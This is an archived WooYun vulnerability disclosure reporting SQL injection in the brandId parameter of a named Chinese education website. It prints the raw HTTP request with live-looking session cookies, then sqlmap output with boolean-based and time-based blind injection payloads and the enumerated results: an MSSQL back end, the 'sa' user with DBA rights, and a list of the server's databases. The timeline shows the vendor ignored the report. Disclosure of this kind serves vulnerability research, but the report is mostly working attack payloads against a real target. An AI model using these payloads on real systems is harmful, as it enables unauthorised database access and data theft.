乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-10: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-23: 厂商已经主动忽略漏洞,细节向公众公开
rt
www.xiaoyuan52.com
GET /ServiceProductDetailServlet?aid=234&brandId= HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.xiaoyuan52.com/Cookie: JSESSIONID=A0BB8836496506E48280E2FD1FF9A6FB; Hm_lvt_02a7e8de3462731a4306808d32ba6624=1449568247; Hm_lpvt_02a7e8de3462731a4306808d32ba6624=1449568247; Hm_lvt_9cb8846b548404438c81aaa02eda4f0f=1449569305,1449569323,1449569337,1449569460; Hm_lpvt_9cb8846b548404438c81aaa02eda4f0f=1449569460; __utma=46112941.752146213.1449568247.1449568247.1449568247.1; __utmb=46112941.4.10.1449568247; __utmc=46112941; __utmz=46112941.1449568247.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); Hm_lvt_1007db9ceeef283a9034565ae4ded9ea=1449568780,1449568809,1449569056,1449569545; Hm_lpvt_1007db9ceeef283a9034565ae4ded9ea=1449569545; __c_sesslist_45193=e9tugjszlg_cy1; __c_pv_45193=6; __c_session_45193=1449568247477812; __c_today_45193=1; __c_review_45193=0; __c_last_45193=1449568247477; __c_visitor=1449568247477812; __c_session_at_45193=1449569463396; HMACCOUNT=73DDED9F0E84E15A; __cs_visitor=1449568247477812; __cs_skey=43cbwd; cokShengId=cb824cad61d045f0a038f4d96100c6b1; cokShiId=df1ede907d8b4753bfe3dd5150e0d63f; cokSchoolId=1773; Hm_lvt_cc0a85323aaa033084fa9bde21f127e9=1449569243; Hm_lpvt_cc0a85323aaa033084fa9bde21f127e9=1449569243; Hm_lvt_fdfea51f5530d9b1730875677c8b0ca8=1449569245; Hm_lpvt_fdfea51f5530d9b1730875677c8b0ca8=1449569245; Hm_lvt_3be674bc521868af0b6a4f4abe42f5e1=1449569247,1449569275; Hm_lpvt_3be674bc521868af0b6a4f4abe42f5e1=1449569275; __utmv=; opcid=1449569277183_1253895130; opsid=1449569277183_1095337246; oppt=oneplus; opsct=1449569277184; opbct=1449569277184; opnt=1449569277184; opstep=1; optime_browser=1449569277183; opstep_event=0; opnt_event=1449569277184; Hm_lvt_927e53b3ef9848d0b2b347b67f64cd59=1449569324,1449569330,1449569460; Hm_lpvt_927e53b3ef9848d0b2b347b67f64cd59=1449569460; __utmt=1; BAIDUID=B6FA785FD29ADA1C8E56E87A07518F28:FG=1Host: www.xiaoyuan52.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
brandId参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: brandId (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: aid=234&brandId=-8286' OR 8471=8471 AND 'yVwZ'='yVwZ Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: aid=234&brandId=-1' OR 4578=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'mzvK'='mzvK---back-end DBMS: Microsoft SQL Server 2008current user: 'sa'current database: 'P2Psite'current user is DBA: Trueavailable databases [8]:[*] master[*] model[*] msdb[*] p2p[*] P2Psite[*] ReportServer[*] ReportServerTempDB[*] tempdb
未能联系到厂商或者厂商积极拒绝